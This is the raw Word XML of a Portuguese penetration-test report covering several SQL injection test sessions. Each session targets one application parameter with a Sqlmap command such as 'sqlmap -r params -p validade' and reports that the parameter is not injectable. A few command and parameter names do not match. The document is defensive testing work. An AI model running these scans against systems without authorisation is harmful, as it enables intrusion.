      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>descricao</w:t>
      </w:r>
      <w:r w:rsidR="00707948" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 16</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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BC1742" w:rsidRPr="00F15F82" w:rsidRDefault="00BC174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C1742" w:rsidRPr="00F15F82" w:rsidRDefault="00BC174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C1742" w:rsidRPr="00F15F82" w:rsidRDefault="00E4538D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2813685</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3952875" cy="180975"/>
                <wp:effectExtent l="0" t="0" r="28575" b="2857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1809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BC983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6" type="#_x0000_t109" style="position:absolute;margin-left:38.7pt;margin-top:221.55pt;width:311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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BC1742" w:rsidRPr="00F15F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49A29FC" wp14:editId="59498F0C">
            <wp:extent cx="5400040" cy="413385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8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777DDF" w:rsidP="00D02F49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Figura 16</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado aplicação SQL Injection via Sqlmap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 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="005E45A3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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Alterar o comando utilizado nas </w:t>
      </w:r>
      <w:r w:rsidR="00D02F49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>essões</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>validade”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="005E45A3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Tentar injeção de SQL no parâmetro “validade”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510DD2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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidR="005E45A3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p validade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804EC" w:rsidRDefault="007804EC" w:rsidP="00630433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qlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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lastRenderedPageBreak/>
        <w:t xml:space="preserve">O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-p” indica o </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">parâmetro a ser injetado </w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“validade” é o parâmetro que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de injeção.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00190AAD" w:rsidRPr="00F15F82" w:rsidRDefault="00190AAD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5E45A3" w:rsidRDefault="005E45A3" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415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8C6DC7" w:rsidRDefault="00190AAD" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415"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spera-se que a aplicação faça o tratamento do parâmetro</w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “validade”</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e não permita que o campo seja injetável</w:t>
      </w:r>
      <w:r w:rsidR="00510DD2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> à SQL</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00925B9A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510DD2" w:rsidRPr="00F15F82" w:rsidRDefault="00510DD2" w:rsidP="00925B9A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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00510DD2" w:rsidRDefault="005967D5" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415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Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00D76012" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415"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Cs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. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00190AAD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“validade” escolhido </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 17</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510DD2" w:rsidRPr="00F15F82" w:rsidRDefault="00510DD2" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D0530" w:rsidRPr="00F15F82" w:rsidRDefault="001F4C0E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E7DACC" wp14:editId="57C19029">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>529590</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2868295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3905250" cy="1238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16B8D" id="Rectangle 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:41.7pt;margin-top:225.85pt;width:307.5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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008D0530" w:rsidRPr="00F15F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601ABC7" wp14:editId="3927EB21">
            <wp:extent cx="5400040" cy="41719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19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777DDF" w:rsidP="001F4C0E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Figura 17</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Resultado exploração Sql Inj</w:t>
      </w:r>
      <w:r w:rsidR="001F4C0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ction via Sqlmap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C6DC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36432A" w:rsidRDefault="0036432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36432A" w:rsidRPr="00F15F82" w:rsidRDefault="0036432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lastRenderedPageBreak/>
        <w:t>Sessão de teste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 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007804EC" w:rsidRDefault="007804EC" w:rsidP="007804EC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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7804EC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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Alterar o comando utilizado nas </w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessões</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s anteriores para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="007804EC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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”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7804EC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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: sqlmap –r params –p </w:t>
      </w:r>
      <w:r w:rsidR="00790EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina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6432A" w:rsidRDefault="0036432A" w:rsidP="00630433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qlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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O comando “–r“ indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“-p” indica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela </w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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“</w:t>
      </w:r>
      <w:r w:rsidR="00790EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é o atributo que sofrerá </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de injeção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71A0F" w:rsidRPr="00F15F82" w:rsidRDefault="00B71A0F" w:rsidP="00CE5109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B71A0F" w:rsidRPr="00F15F82" w:rsidRDefault="00B71A0F" w:rsidP="00CE5109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spera-se que a aplicação faça o tratamento do parâmetro “</w:t>
      </w:r>
      <w:r w:rsidR="00CE5109">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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E5109" w:rsidRDefault="005967D5" w:rsidP="00CE5109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Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00D76012" w:rsidP="00CE5109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Cs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. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CE5109">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 18</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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D0530" w:rsidRPr="00F15F82" w:rsidRDefault="00BD295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2776855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="142240"/>
                <wp:effectExtent l="0" t="0" r="28575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42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DEC5B" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:38.7pt;margin-top:218.65pt;width:308.25pt;height:1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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008D0530" w:rsidRPr="00F15F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B7411F3" wp14:editId="3EE183A0">
            <wp:extent cx="5400040" cy="4112260"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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0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777DDF" w:rsidP="00D45386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Figura 18</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap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45386" w:rsidRDefault="00D45386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 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00D45386">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="708"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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alterar o comando utilizado nas </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
